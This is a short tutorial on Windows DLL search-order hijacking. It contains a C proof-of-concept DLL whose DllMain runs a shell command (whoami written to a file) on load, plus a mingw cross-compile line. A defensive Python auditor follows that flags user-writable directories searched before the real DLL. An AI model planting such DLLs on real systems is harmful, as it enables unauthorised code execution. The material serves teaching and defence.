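Exploiting the Windows DLL search order is basically the same idea as exploiting LD_LIBRARY_PATH on Linux: the loader resolves a library by name through an ordered list of directories, and the first match wins.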

A stub malicious DLL:

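#include <windows.h>
#include <stdlib.h>	/* system() */

/* Called by the loader when the DLL is mapped into a process. */
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
	if (dwReason == DLL_PROCESS_ATTACH) {
		/* Backslashes must be escaped inside a C string literal. */
		system("cmd.exe /C whoami > C:\\Temp\\dll.txt");
		ExitProcess(0);
	}
	return TRUE;
}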

Compile with mingw (on Linux!):

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
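
From the defender's side, the useful question is which directories the loader consults before it reaches the legitimate copy of a DLL. The following is an added example, not code from the original page: it models the standard desktop search order and reports every user-writable directory searched before a bare DLL name resolves. Assumptions: the function names are hypothetical, the paths, file list and writable set are constructed sample data, and KnownDLLs, already-loaded modules and manifest redirection are not modelled.

```python
from pathlib import PureWindowsPath

def norm(p):
    # Windows paths are case-insensitive; compare on a normalised form.
    return str(PureWindowsPath(p)).lower()

def search_order(app_dir, cwd, path_dirs, safe_mode=True, root=r"C:\Windows"):
    """Directories tried, in order, for a bare DLL name by a desktop app.
    Not modelled: KnownDLLs, already-loaded modules, manifest redirection."""
    sys_dirs = [root + r"\System32", root + r"\System", root]
    if safe_mode:            # SafeDllSearchMode on (the default)
        order = [app_dir, *sys_dirs, cwd, *path_dirs]
    else:                    # legacy: current directory right after app dir
        order = [app_dir, cwd, *sys_dirs, *path_dirs]
    seen, out = set(), []
    for d in order:          # drop duplicates, keep first position
        if norm(d) not in seen:
            seen.add(norm(d))
            out.append(d)
    return out

def audit(dll, order, files, writable):
    """Return (resolved_path_or_None, user-writable dirs searched on the way)."""
    files = {norm(f) for f in files}
    writable = {norm(w) for w in writable}
    risky = []
    for d in order:
        if norm(d) in writable:
            risky.append(d)
        candidate = str(PureWindowsPath(d) / dll)
        if norm(candidate) in files:
            return candidate, risky
    return None, risky

# Constructed sample host state (not taken from a real machine).
APP, CWD = r"C:\Program Files\Acme", r"C:\Users\alice\Downloads"
PATH = [r"C:\Windows\System32", r"C:\Tools"]
FILES = [r"C:\Windows\System32\version.dll"]
WRITABLE = [CWD, r"C:\Tools"]

if __name__ == "__main__":
    for safe in (True, False):
        order = search_order(APP, CWD, PATH, safe_mode=safe)
        for dll in ("version.dll", "acmeplugin.dll"):
            print(safe, dll, audit(dll, order, FILES, WRITABLE))
```

An empty second element means no writable directory precedes the legitimate copy; a `None` first element means the name resolves nowhere, so every writable directory listed is a candidate location the loader would accept.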